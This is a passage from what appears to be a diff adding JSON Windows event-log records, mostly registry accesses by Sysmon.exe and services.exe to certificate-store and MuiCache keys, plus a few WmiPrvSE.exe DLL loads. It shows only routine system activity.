"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntasn1.dll", + "image_path": "C:\\Windows\\System32\\ntasn1.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "cfgbkend.dll", + "image_path": "C:\\Windows\\System32\\cfgbkend.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 